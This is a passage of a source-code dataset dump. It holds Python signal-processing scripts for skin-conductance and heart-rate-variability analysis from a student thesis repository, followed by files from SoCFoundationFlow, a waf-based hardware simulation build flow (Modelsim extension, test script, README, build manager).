"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 30 14:35:19 2020\n\n@author: admin\n\"\"\"\n\nimport pandas as pd\nimport scipy.signal as scisig\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef butter_lowpass(cutoff, fs, order=5):\n # Filtering Helper functions\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = scisig.butter(order, normal_cutoff, btype='low', analog=False)\n return b, a\n\ndef butter_lowpass_filter(data, cutoff, fs, order=5):\n # Filtering Helper functions\n b, a = butter_lowpass(cutoff, fs, order=order)\n y = scisig.lfilter(b, a, data)\n return y\n\ndef peak_detection(df_EDA):\n f = 4 # サンプリング周波数\n threshold = 0.01 # 閾値(振幅がこれより大きいものをSCRとして検出)\n\n df_EDA['filtered_eda'] = butter_lowpass_filter(df_EDA['EDA'], 1.0, f, order=5)\n EDA_shift = df_EDA['filtered_eda'][1:].values - df_EDA['filtered_eda'][:-1].values\n\n peaks = np.zeros(len(EDA_shift))\n peak_sign = np.sign(EDA_shift)\n bottoms = np.zeros(len(EDA_shift))\n peak_starts = np.zeros(len(EDA_shift))\n\n for i in range(len(EDA_shift)-1):\n if peak_sign[i] == -1 and peak_sign[i+1] == 1:\n bottoms[i+1] = 1\n if peak_sign[i] == 1 and peak_sign[i+1] == -1:\n peaks[i+1] = 1\n\n peak_locs = np.where(peaks == 1)\n bottom_locs = np.where(bottoms == 1)\n df_peak = pd.Series(peak_locs[0], name='Peak')\n df_bottom = pd.Series(bottom_locs[0], name='Bottom')\n\n if df_peak[0] < df_bottom[0]:\n df_peak = df_peak[1:].reset_index(drop=True)\n if df_peak[len(df_peak)-1] < df_bottom[len(df_bottom)-1]:\n df_bottom = df_bottom[:-1].reset_index(drop=True)\n\n PeakInfo = pd.concat([df_peak,df_bottom], axis=1)\n PeakInfo['PeakStart'] = PeakInfo['Bottom']\n\n for i in range(len(PeakInfo)-1):\n if i == 0:\n pass\n else:\n if PeakInfo['Peak'][i] - PeakInfo['Peak'][i-1] < 4:\n if df_EDA['filtered_eda'][PeakInfo['Bottom'][i]] >= df_EDA['filtered_eda'][PeakInfo['PeakStart'][i-1]] :\n PeakInfo['PeakStart'][i] = PeakInfo['PeakStart'][i-1]\n else:\n pass\n\n PeakInfo['PeakValue'] = df_EDA['filtered_eda'][PeakInfo['Peak']].reset_index(drop=True)\n PeakInfo['PeakStartValue'] = df_EDA['filtered_eda'][PeakInfo['PeakStart']].reset_index(drop=True)\n PeakInfo['Amplitude'] = PeakInfo['PeakValue'] - PeakInfo['PeakStartValue']\n\n SCR_param = pd.DataFrame()\n SCR_Param = PeakInfo[ PeakInfo['Amplitude'] > threshold ].reset_index(drop=True)\n SCR_Param['RiseTime'] = (SCR_Param['Peak'] - SCR_Param['PeakStart']) / f\n SCR_Param['HalfRecoveryTime'] = 0\n\n half_times = []\n HalfRecovery_window = 100 # 1/2回復時間を探すときのウィンドウ\n\n for i in range(len(SCR_Param)):\n peak_loc = SCR_Param['Peak'][i]\n half_loc = peak_loc\n half_amplitude = SCR_Param['Amplitude'][i] * 0.5\n found = 0\n while half_loc < half_loc + HalfRecovery_window and found == 0 and half_loc < len(df_EDA):\n if half_amplitude <= df_EDA['filtered_eda'][peak_loc] -df_EDA['filtered_eda'][half_loc]:\n # SCR_Param['HalfRecoveryTime'][i] = (half_loc - peak_loc) / f\n half_times = np.append(half_times, (half_loc - peak_loc) / f)\n found = 1\n\n half_loc += 1\n if found == 0:\n # SCR_Param['HalfRecoveryTime'][i] = HalfRecovery_window\n half_times = np.append(half_times, 0)\n\n SCR_Param['HalfRecoveryTime'] = half_times\n\n SCR_Param.rename(columns={'Peak': 'PeakTime', 'Bottom': 'BottomTime', 'PeakStart': 'PeakStartTime'}, inplace=True)\n\n SCR_Param['PeakTime'] = SCR_Param['PeakTime'] / f\n SCR_Param['BottomTime'] = SCR_Param['BottomTime'] / f\n SCR_Param['PeakStartTime'] = SCR_Param['PeakStartTime'] / f\n\n return df_EDA, SCR_Param\n"
},
{
"alpha_fraction": 0.45882704854011536,
"alphanum_fraction": 0.4897255003452301,
"avg_line_length": 26.895397186279297,
"blob_id": "b53e2d5d044d16c30d8b0dae482baeb71b28b25b",
"content_id": "b7447047c83be4ba36a036de017980a486046110",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6906,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 239,
"path": "/code/hrv.py",
"repo_name": "sota-takahashi0731/bachelor",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport math\nimport statsmodels.api as sm\nimport numpy.linalg as LA\nfrom statsmodels.tsa import ar_model\nimport scipy as sp\nimport datetime as dt\nimport scipy.stats as stats\nfrom scipy import integrate\n\n\n###SG検定による異常値除去\ndef smirnov_grubbs(data, t, alpha):\n x, o = list(data), []\n while True:\n n = len(x)\n t1 = stats.t.isf(q=(alpha / n) / 2, df=n - 2)\n tau = (n - 1) * t1 / np.sqrt(n * (n - 2) + n * t1 * t1)\n i_min, i_max = np.argmin(x), np.argmax(x)\n myu, std = np.mean(x), np.std(x, ddof=1)\n i_far = i_max if np.abs(x[i_max] - myu) > np.abs(x[i_min] - myu) else i_min\n tau_far = np.abs((x[i_far] - myu) / std)\n if tau_far < tau: break\n o.append(i_far)\n x.pop(i_far)\n for i in o:\n t = np.delete(t, i)\n return np.array(x), np.array(t)\n\n\ndef outlier_rm(data, t):\n #心拍変動データの三次スプライン補完\n t = np.array(t)\n\n dataf = sp.interpolate.interp1d(t,data,kind=\"cubic\")\n t = np.array(range(int(t.max())))\n\n data = dataf(t)\n #異常値除去+欠損値補間\n data, t= smirnov_grubbs(data, t, 0.05)\n dataf = sp.interpolate.interp1d(t, data, kind=\"linear\")\n data = dataf(t)\n\n return data, t\n\ndef RRI_data(df_rri, date):\n df_rri['time'] = date + df_rri['time']\n rri = df_rri.values[:, 1]\n t_datetime_rri = [dt.datetime.strptime(df_rri['time'][i], '%Y/%m/%d %H:%M:%S') for i in range(df_rri.shape[0])]\n t_unix_rri = [0] * df_rri.shape[0]\n t_unix_rri[0] = t_datetime_rri[0].timestamp()\n for i in range(1, df_rri.shape[0]):\n t_unix_rri[i] = t_unix_rri[i-1]+rri[i]*0.001\n return rri, t_unix_rri\n\n###PSDの計算\ndef psd_cal(data):\n model = ar_model.AR(data)\n results = model.fit(maxlag=12)\n k = 12\n N = 512\n Y = results.predict()\n A = results.params #係数ai\n res = results.resid #分散σ^2\n s = res.std(ddof=0)\n s2 = s**2\n\n\n # Frequency = np.fft.fftfreq(N, d=dt)\n freq = np.arange(0, 0.5, 0.5/N)\n P= []\n\n\n # for f in Frequency[:int(N/2)]:\n for f in freq:\n S = 0\n for i in range(1, results.k_ar + 1):\n S += results.params[i] * (math.e)**(-2 * math.pi * 1j * i * f)\n psd = s2 / (abs(1 - S))**2\n P = np.append(P, psd)\n return P, freq\n\n\n\n###LP面積の計算\ndef LP_cal(data):\n N = data.shape[0]\n #データ可視化\n RRIn = np.array(data[:N-1])\n RRIn1 = np.array(data[1:])\n a = np.column_stack((RRIn, RRIn1))\n N = a.shape[0]\n\n ###LP面積算出\n #y=xへの投影\n pro_yx = np.zeros((N, 2))\n b = np.array([1,1])\n for i in range(N):\n pro_yx[i, :] = np.dot(a[i,:], b)/np.dot(b, b) *b\n #y=-xへの投影\n pro_y_x = np.zeros((N, 2))\n b = np.array([1,-1])\n for i in range(N):\n pro_y_x[i,:] = np.dot(a[i,:], b)/np.dot(b, b) * b\n #ノルムの計算\n d_yx = np.zeros(N)\n d_y_x = np.zeros(N)\n for i in range(N):\n d_yx[i] = LA.norm(pro_yx[i, :], ord=2)\n d_y_x[i] = LA.norm(pro_y_x[i, :], ord=2)\n #標準偏差の算出\n s_yx = np.std(d_yx)\n s_y_x = np.std(d_y_x)\n S = math.pi * s_yx * s_y_x\n d = np.mean(d_yx)\n return S, s_yx/s_y_x, np.log10(s_yx*s_y_x)\n\n###LF,HFの計算\ndef linerequation(x1, y1, x2, y2):\n a = (y2 - y1) / (x2 - x1)\n b = y1 - a * x1\n return a, b\n\ndef Integrate(x1, y1, x2, y2):\n a = (y2 - y1) / (x2 - x1)\n b = y1 - a * x1\n\n y = lambda x: a*x + b\n S, err = integrate.quad(y, x1, x2)\n return S\n\ndef calc_LF_HF(Pow, freq):\n # LF, HFの閾値の設定\n VLF_lower, VLF_upper = 0, 0.05\n LF_lower, LF_upper = 0.05, 0.15\n HF_lower, HF_upper = 0.15, 0.40\n VLF = 0\n # for i in range(int(N/2) + 1):\n for i in range(len(freq)):\n if VLF_lower <= freq[i] < VLF_upper:\n if freq[i-1] <= VLF_lower:\n a1, b1 = linerequation(freq[i-1], Pow[i-1], freq[i], Pow[i])\n y1 = lambda x: a1 * x 
+ b1\n VLF, err = integrate.quad(y1, VLF_lower, freq[i])\n\n vlf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n VLF += vlf\n\n elif VLF_upper <= freq[i+1]:\n a1, b1 = linerequation(freq[i], Pow[i], freq[i+1], Pow[i+1])\n y1 = lambda x: a1 * x + b1\n vlf, err = integrate.quad(y1, freq[i], VLF_upper)\n VLF += vlf\n\n else:\n vlf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n VLF += vlf\n\n elif LF_lower < freq[i] < LF_upper:\n if freq[i-1] <= LF_lower:\n a1, b1 = linerequation(freq[i-1], Pow[i-1], freq[i], Pow[i])\n y1 = lambda x: a1 * x + b1\n LF, err = integrate.quad(y1, LF_lower, freq[i])\n\n lf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n LF += lf\n\n elif LF_upper <= freq[i+1]:\n a1, b1 = linerequation(freq[i], Pow[i], freq[i+1], Pow[i+1])\n y1 = lambda x: a1 * x + b1\n lf, err = integrate.quad(y1, freq[i], LF_upper)\n LF += lf\n\n else:\n lf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n LF += lf\n\n elif 0.15 <= freq[i] < 0.40:\n if freq[i-1] <= HF_lower:\n a1, b1 = linerequation(freq[i-1], Pow[i-1], freq[i], Pow[i])\n y1 = lambda x: a1 * x + b1\n HF, err = integrate.quad(y1, HF_lower, freq[i])\n\n hf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n HF += hf\n\n elif HF_upper <= freq[i+1]:\n a1, b1 = linerequation(freq[i], Pow[i], freq[i+1], Pow[i+1])\n y1 = lambda x: a1 * x + b1\n hf, err = integrate.quad(y1, freq[i], HF_upper)\n HF += hf\n\n else:\n hf = Integrate(freq[i], Pow[i], freq[i+1], Pow[i+1])\n HF += hf\n\n return VLF, LF, HF\n\ndef HR_cal(RRI):\n RRI = np.array(RRI)\n HR = np.empty_like(RRI)\n for i, rri in enumerate(RRI):\n HR[i] = 60000/rri\n return HR\n\ndef params_cal(RRI):\n RRI = np.array(RRI)\n N = RRI.shape[0]\n\n ##時系列指標\n mean = np.mean(RRI) #平均値\n SDNN = np.std(RRI) #標準偏差\n #pNN50の計算\n pNNcnt = 0\n diff = [0]*(N-1)\n for i in range(N-1):\n diff[i] = RRI[i+1]-RRI[i]\n if abs(diff[i]) > 50:\n pNNcnt+=1\n pNN50 = pNNcnt/(N-1)\n #RMSSDの計算\n RMSSD = 0\n for i in range(N-1):\n RMSSD += diff[i]**2\n RMSSD = math.sqrt(RMSSD/(N-1))\n\n ##PSD関連パラメータ\n P, freq = psd_cal(RRI)\n VLF, LF, HF = calc_LF_HF(P, freq)\n TotalPow = VLF + LF + HF\n\n ###幾何学指標\n S, CSI = LP_cal(RRI)\n\n params = [mean, SDNN, pNN50, RMSSD, VLF, LF, HF, LF/HF, TotalPow, S]\n\n return params\n"
},
{
"alpha_fraction": 0.5344827771186829,
"alphanum_fraction": 0.563894510269165,
"avg_line_length": 28.878787994384766,
"blob_id": "4a09c6633d77e957ec5e78f15b03d2d3a6931dc0",
"content_id": "ecd2f757e6d8f0c1317be5fe4cb2af48a0d3dd5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1016,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 33,
"path": "/code/E4.py",
"repo_name": "sota-takahashi0731/bachelor",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\ndef time_sync(data, t_unix, t_start, t_end):\n ts = 0\n #データのスタート時刻を合わせる\n for i, ti in enumerate(t_unix):\n if ts==0 and int(ti)>=int(t_start):\n ts = i\n if int(ti)>=t_end:\n eda_data = data[ts:i]\n t_data = t_unix[ts:i]\n break\n print(ts, i)\n t_data = [(t_data[i]-t_data[0]) for i in range(len(t_data))]\n return eda_data, t_data\n\ndef ibi_data(df_ibi):\n t_ibi = df_ibi.values[:, 0]\n ibi = df_ibi.values[:, 1]\n t_unix_ibi = [(t_ibi[i]+float(df_ibi.columns[0])) for i in range(t_ibi.shape[0])]\n ibi = ibi*1000\n return ibi, t_unix_ibi\n\ndef bvp_data(df_bvp):\n bvp = df_bvp.values[1:, 0]\n t_unix_bvp = [(0.015625*i+float(df_bvp.columns[0])) for i in range(bvp.shape[0])]\n return bvp, t_unix_bvp\n\ndef eda_data(df_eda):\n eda = df_eda.values[1:, 0]\n t_unix_eda = [(0.25*i+float(df_eda.columns[0])) for i in range(eda.shape[0])]\n return eda, t_unix_eda\n"
},
{
"alpha_fraction": 0.5975308418273926,
"alphanum_fraction": 0.6271604895591736,
"avg_line_length": 19.25,
"blob_id": "aee0bc880feadb6f95b625f0dc355ec4f5f39222",
"content_id": "f6a827ec8773a7d3cdd8f64750024645ade4c063",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 405,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 20,
"path": "/code/anova.py",
"repo_name": "sota-takahashi0731/bachelor",
"src_encoding": "UTF-8",
"text": "import pyper\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nscore_name = 'SCR'\n\ndf = pd.read_excel('../log/total/CA.xlsx')\n#df = df[['A', 'B', score_name]]\ndf = df[['a1', 'a1.1', 'a2', 'a2.1']]\n\nprint(df)\n\nr = pyper.R(use_pandas='True')\n\nr.assign('data', df)\n\nr(\"source('anovakun_485.txt', encoding='utf-8')\")\nresult = r('anovakun(data,\"sAB\", 2, 2, eta=T, holm=T)')\nprint(result)\n"
}
] | 4 |
JohnSkubic/SoCFoundationFlow | https://github.com/JohnSkubic/SoCFoundationFlow | 79e860ea5383b48cf99d3450353f19975c7616e4 | 157179b140c20c4c6992ee6056192829f120c352 | eb58d01b1da69f922397c07f8ba68abf188b7607 | refs/heads/master | 2021-01-20T03:14:28.387822 | 2017-06-01T20:51:13 | 2017-06-01T20:51:13 | 89,514,600 | 0 | 0 | null | 2017-04-26T18:38:05 | 2016-12-02T06:40:03 | 2016-12-02T06:55:58 | null | [
{
"alpha_fraction": 0.5594956874847412,
"alphanum_fraction": 0.5621224045753479,
"avg_line_length": 27.200000762939453,
"blob_id": "c2e9bafaec3579a3a8fc88ea3b953f49bcd1dbef",
"content_id": "5b38b523c90ef44181c1525558476d1fd168f558",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3807,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 135,
"path": "/admin/waf/waf-extensions/SFFmodelsim.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n# John Skubic, 2017\n\n\"\"\"\nClasses and helper functions used to provide\n\"sim_source\"\n\"verify_source\"\nvia the Mentor Graphics Modelsim suite\n\"\"\"\n\nfrom waflib import Context\nfrom waflib import Build\nfrom waflib import Logs\nfrom waflib import Node\nfrom waflib import TaskGen\nfrom waflib import Task\nfrom waflib import Utils\nfrom waflib.Configure import conf\nfrom waflib.TaskGen import feature, before_method, after_method\nimport pickle\nimport os,sys\nfrom SFFbuildmgr import SFF_verilog_scan\nfrom SFFbuildmgr import SFFUnitsCont, SFFUnit, SFFView, load_SFFUnits\n\ndef configure(ctx):\n \"\"\"\n Modelsim: Find all the necessary parts of the Modelsim Simulator.\n \"\"\"\n ctx.find_program('vlog')\n ctx.find_program('vcom')\n ctx.find_program('vlib')\n ctx.find_program('vsim')\n\ndef _simulate(ctx, gui):\n \"\"\"\n Load the SFFUnits into the system.\n Create the necessary tasks to build the simulation libs\n Kick vsim targetting the testbench\n \"\"\"\n ctx.env['SFFUnits'] = load_SFFUnits(ctx)\n\n \"\"\"\n Creates the directory path and nodes in the build directory.\n Creates a taskgen from each other library in units_hdl\n \"\"\"\n\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n\n for u in top.synu_deps + top.simu_deps:\n lib = u.script.parent.get_bld().make_node('work_vlib')\n lib.mkdir()\n u.b['vlib'] = lib\n\n if u.use('use'):\n tsk = ModelsimTask(\n name=u.name,\n target=lib,\n source=u.use('src'),\n includes=u.use('includes'),\n after=u.use('use'),\n output=lib,\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk)\n else:\n tsk = ModelsimTask(\n name=u.name,\n target=lib,\n source=u.use('src'),\n output=lib,\n includes=u.use('includes'),\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk)\n\n\n \"\"\"\n Create the testbench taskgen last as it is always at the top dep\n \"\"\"\n ctx.add_group()\n tb_lib = top.script.parent.get_bld().make_node('work_vlib')\n tb_lib.mkdir()\n top.b['tbvlib'] = tb_lib\n\n tsk = ModelsimTask(\n name=top.use('tb'),\n target=tb_lib,\n source=top.use('tb_src'),\n output=tb_lib,\n includes=top.use('tb_includes'),\n after=ctx.env.top_level,\n scan=SFF_verilog_scan,\n env=ctx.env )\n ctx.add_to_group(tsk)\n ctx.add_group()\n\n \"\"\"\n Run the Modelsim command with gui options provided.\n \"\"\"\n ##Run vsim\n ctx(name='vsim',\n rule='vsim %s -lib %s %s' % (gui,top.b['tbvlib'], top.use('tb')[0]),\n always = True)\n\nclass ModelsimTask(Task.Task):\n def __init__(self, *k, **kw):\n Task.Task.__init__(self, *k, **kw)\n\n self.set_inputs(list(kw['source']))\n self.set_outputs(kw['output'])\n self.includes = kw['includes']\n self.before = ['ncelab','ncsim']\n from types import MethodType\n self.scan = MethodType(kw['scan'],self)\n\n\n def __str__(self):\n return '%s: %s\\n' % (self.__class__.__name__,self.outputs[0])\n\n def run(self):\n src = ''\n for s in self.inputs:\n src += s.bldpath() + ' '\n tgt = self.outputs[0].bldpath()\n incs = ''\n if hasattr(self.generator,'includes'):\n incs = ''\n for inc in getattr(self.generator,'includes'):\n incs += '+incdir+' + inc.bldpath() + ' '\n res = ''\n cmd_setup = 'vlib %s; ' % (self.outputs[0])\n cmd = '%s vlog -sv -work %s %s %s' % (cmd_setup, self.outputs[0],\n incs, src)\n return self.exec_command(cmd)\n"
},
{
"alpha_fraction": 0.5854383111000061,
"alphanum_fraction": 0.5943536162376404,
"avg_line_length": 31,
"blob_id": "d76de4a5c033baba1477c234cb63b268a5fb01d0",
"content_id": "e754f469b6498167bdc43eeef9784e789bdb6e58",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 673,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 21,
"path": "/waf_test/run_tests.bash",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ntests=(defaults defaults_n_user basic_dependencies include_only src_only tb_include_only tb_only two_src find_src basic_views)\n\n#Testing the check option\nfor ((i = 0; i < ${#tests[@]}; i++)); do\n printf \"\\nRunning: ${tests[$i]} \\n\"\n printf \"waf configure --top_level=${tests[$i]} --check\\n\\n\"\n eval \"waf configure --top_level=${tests[$i]} --check\"\n if [ $? -ne 0 ]; then exit 1; fi\n\ndone\n\n#Testing without the check\nfor ((i = 0; i < ${#tests[@]}; i++)); do\n printf \"\\nRunning: ${tests[$i]} \\n\"\n printf \"waf configure --top_level=${tests[$i]}\\n\"\n eval \"waf configure --top_level=${tests[$i]}\"\n if [ $? -ne 0 ]; then exit 1; fi\n\ndone\n\n"
},
{
"alpha_fraction": 0.7571815848350525,
"alphanum_fraction": 0.7571815848350525,
"avg_line_length": 20.952381134033203,
"blob_id": "72ea68101bf66e9db5264d402fbdf37698c4adf1",
"content_id": "cb9c93466bb21a3ed540157c7d05c9d43a31bf9c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1845,
"license_type": "permissive",
"max_line_length": 197,
"num_lines": 84,
"path": "/README.md",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "# SoCFoundationFlow (SFF)\n\n## Setting up SFF\n\nBash:\n\nAdd the following lines to your ~/.bashrc file.\n~~~~\nexport SFF_ADMIN=<absolute path to admin directory of SFF>\nsource $SFF_ADMIN/setup_env.bash\nexport SFF_SIM_ENV=<Simulation Environment>\n~~~~\n\nTcsh:\n\nAdd the following lines to your ~/.cshrc file.\n~~~~\nsetenv SFF_ADMIN <absolute path to admin directory of SFF>\nsource $SFF_ADMIN/setup_env.tcsh\nsetenv SFF_SIM_ENV <Simulation Environment>\n~~~~\n\n## Running WAF\n\nAll files created by WAF will end up in the build directory.\n\nClearing the build directory:\n~~~\nwaf distclean\n~~~\n\nSetting up your project:\n~~~\nwaf configure --top_level=<top_level>\n~~~\n\nRunning a simulation without the gui:\n~~~\nwaf verify_source\n~~~\n\nRunning a simulation with the gui:\n~~~\nwaf sim_source\n~~~\n\nOutputting source and include file lists:\n~~~\nwaf dump_source\n~~~\nThe file dumps will be in a subdirectory of build. The name of this directory will be the name of the directory will be:\n\nbuild/<dir_of_wscript>/work_dump/\n\n## Currently Supported Simulation Environments\n\nThe simulation environment dictates what tools will be used when simulating designs. The following list are values that can be set in the SFF_SIM_ENV variable to choose the respective environment.\n\n- incisive\n- modelsim\n\nThe following environments will be supported in future updates.\n\n- iverilog\n\n\n## Dependencies\n\nThe following tools must be installed for all simulation environments.\n\n- [Veripool Verilog-Perl](https://www.veripool.org/wiki/verilog-perl)\n - Requires the command \"vppreproc\" to be on your path\n\n### Incisive\n\nThe following tools must be installed for the incisive simulation environment.\n\n### Modelsim\n\nThe following tools must be installed for the modelsim simulation environment.\n\n### Iverilog\n\nThe following tools must be installed for the iverilog simuation environment.\n\n"
},
{
"alpha_fraction": 0.5250757932662964,
"alphanum_fraction": 0.5283881425857544,
"avg_line_length": 33.29280090332031,
"blob_id": "65b2a49e9a3b5b0ba14a562041bd10e70742f788",
"content_id": "8a8222eeaafc5984e8066fccd66a75e6aae2366a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21435,
"license_type": "permissive",
"max_line_length": 157,
"num_lines": 625,
"path": "/admin/waf/waf-extensions/SFFbuildmgr.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n# Matthew Swabey, 2015\n# Matthew Swabey, 2016\n\n\"\"\"\nClasses and helper functions used to build the Foundation Flow.\nAnything that is used by more than one tool lives here.\n\nTODO:\n3) Make it work with Incisive.\n4) Consider using a +view notation to add a view to existing views.\n\"\"\"\n\nfrom waflib.Configure import conf\nfrom waflib import Build\nfrom waflib import Logs\nfrom waflib import Utils\nfrom waflib import Errors\nfrom waflib import Context\nfrom waflib import Options\nfrom waflib import Node\nimport pickle\nimport os.path\nimport sys\nimport SFFutil\nimport SFFerrors\n\n\ndef options(ctx):\n ctx.add_option('--top_level', action='store',\n help=('Set the root unit of the design'))\n\n ctx.add_option('--views', action='store', default='default',\n help=('Set an ordered, comma-separated, list of views to '\n 'supply to the command.'))\n\n ctx.add_option('--check', action='store_true', default=False,\n help=('Check all units for correctness.'))\n\ndef configure(ctx):\n if not ctx.options.top_level:\n raise Errors.ConfigurationError(\n 'SoCManager: Please set a top level unit by running waf '\n 'configure --top_level=<top_level>')\n ctx.env['top_level'] = ctx.options.top_level\n ctx.env['views'] = ctx.options.views\n ctx.env['check'] = ctx.options.check\n\n \"\"\"Create class in the context to hold/manipulate the SFFUnits.\"\"\"\n ctx.SFFUnits = ctx.SFFUnitsCont()\n\n \"\"\"File extensions to compile as Verilog.\"\"\"\n ctx.env.VLOG_EXT = ['.v']\n \"\"\"File extensions to compile as VHDL.\"\"\"\n ctx.env.VHDL_EXT = ['.vhdl', '.vhd']\n \"\"\"File extensions to compile as System Verilog.\"\"\"\n ctx.env.SVLOG_EXT = ['.sv']\n \"\"\"File extensions to identify Synopsys Design Constraints (SDC) files.\"\"\"\n ctx.env.SDC_EXT = ['.sdc']\n\n \"\"\"\n Static version of Perl vppreproc http://www.veripool.org/ used to parse\n verilog for headers.\n \"\"\"\n ctx.find_program('vppreproc')\n\n@conf\nclass SFFUnitsCont():\n \"\"\"\n Class to store and manipulate SFFUnit objects.\n \"\"\"\n def __init__(self, ctx):\n \"\"\"\n Create an empty dictionary to store the units.\n Store the ctx where we were created for later.\n \"\"\"\n self.check = ctx.env['check']\n self.ctx = ctx\n self.units = {}\n self.top_level = ctx.env['top_level']\n self._packed = False\n self.views = SFFutil.strtolist(ctx.env['views'])\n self.synu_deps = []\n self.simu_deps = []\n\n def getunit(self, unit):\n if isinstance(unit, list):\n return [self.units.get(u) for u in unit]\n else:\n return self.units[unit]\n\n def add(self, *args, **kwargs):\n \"\"\"\n Creates a SFFUnit and inserts it into the unit dictionary if there\n isn't already an existing one.\n \"\"\"\n unit = self.ctx.SFFUnit(*args, **kwargs)\n\n if unit.name in self.units:\n raise Errors.ConfigurationError(\n (\"SoCManager: Error. Module names must be unique. Module '{0}'\"\n \" from script '{1}' already defined by script '{2}'\").format(\n unit.name, self.ctx.cur_script.srcpath(),\n self.getunit(unit.name).script.srcpath()))\n self.units[unit.name] = unit\n\n def addview(self, name, view, **kwargs):\n if name not in self.units:\n raise Errors.ConfigurationError(\n (\"SoCManager: Error. 
Cannot find Module '{0}'\"\n \" from script '{1}' to add view '{2}'\").format(\n name, self.ctx.cur_script.srcpath(), view))\n else:\n self.units[name].addview(view, **kwargs)\n\n def _buildunitdeps(self, unit_order, unit):\n \"\"\"\n Order a list which can be built from left to right to build all\n units from a dictionary of named units which have\n a subkey 'use' referring to other named prerequisite units.\n If memory becomes a problem then change to iterative from recursion.\n \"\"\"\n if unit in unit_order:\n return unit_order\n elif 'use' in self.units[unit]._k.keys():\n for u in self.units[unit]._k.use('use'):\n try:\n unit_order = self._buildunitdeps(unit_order, u)\n except KeyError:\n raise Errors.ConfigurationError(('Unit \\'{0}\\''\n ' required by \\'{1}\\' defined in \\'{2}\\' has not been'\n ' defined.').format(u, unit,\n self.units[unit].script.srcpath()) )\n\n unit_order.append(unit)\n return unit_order\n\n def get_unit_deps(self, name):\n \"\"\"\n Starting at unit 'name' generate two lists of deps in leaf first order\n \"\"\"\n synu_deps = self._buildunitdeps([], name)\n\n simu_deps = []\n if 'tb_use' in self.units[name]._k.keys():\n for tb_dep in self.units[name]._k.use('tb_use'):\n simu_deps = self._buildunitdeps(simu_deps, tb_dep)\n simu_deps = [u for u in simu_deps if u not in synu_deps]\n\n return synu_deps, simu_deps\n\n def finalize(self):\n \"\"\"\n If --check is not defined:\n 1) Process the unit views' inheritance on the use and use_tb keys\n 2) Search the unit tree from the top and build the dependency order\n from --top_level unit for syn and sim using use and use_tb\n 3) Drop unused units from self.units to save memory and processing\n 4) Process the unit views' inheritance on remaining keys\n 5) Pickle internal state where necessary and store to env['SFFUnits']\n\n if --check is defined:\n 1) Check every view of every unit\n 2) Go back to 1) above\n TODO 1.5) Walk all deps\n\n \"\"\"\n\n # Test the existence of the top_level unit key\n try:\n self.getunit(self.top_level)\n except KeyError:\n raise Errors.ConfigurationError(('Top Level \"{0}\" not'\n ' found. 
Please re-run \"waf configure --top_level= \" with the'\n ' correct top_level name or check the unit names and recurses'\n ' in your wscript files.').format(self.top_level))\n\n if self.check:\n self.ctx.msg('Option', '--check', color='BLUE')\n for m in self.units:\n self.units[m].check_all()\n\n # Apply inheritance on the use and tb_use directives\n for name,unit in self.units.items():\n self.units[name].applyinheritance(self.views, ('use','tb_use'))\n\n # Get the top_level unit dependencies from the use and tb_use keys\n synu,simu = self.get_unit_deps(self.top_level)\n self.synu_deps = synu\n self.simu_deps = simu\n\n # Prune the SFFUnits dictionary to only syn and sim units\n self.units = dict((k, self.units[k])\n for k in simu + synu)\n\n # Apply inheritance on all keys\n for name,unit in self.units.items():\n self.units[name].applyinheritance(self.views)\n\n # Get and store the unit dependencies from the use and tb_use keys\n for name,unit in self.units.items():\n synu,simu = self.get_unit_deps(name)\n self.units[name].set_deps(self.getunit(synu), self.getunit(simu))\n\n self.ctx.msg('top_level set to', '{0}'.format(self.top_level),\n color='BLUE')\n self.ctx.msg('Units for simulation', '{0}'.format(self.simu_deps),\n color='BLUE')\n self.ctx.msg('Units for synthesis', '{0}'.format(self.synu_deps),\n color='BLUE')\n\n # Context contains one or more waflib.Nodes.Nod3 which cannot be\n # pickled so we have to get rid of it. Also the configuration\n # context is not valid in build etc.\n for m in self.units:\n self.units[m].pack()\n env = self.ctx.env\n delattr(self,'ctx')\n env['SFFUnits'] = pickle.dumps(self)\n self._packed = True\n\n def unpack(self, ctx):\n self.ctx = ctx\n for name,unit in self.units.items():\n unit.unpack(ctx)\n self._packed = False\n\ndef load_SFFUnits(ctx):\n new_SFFUnits = 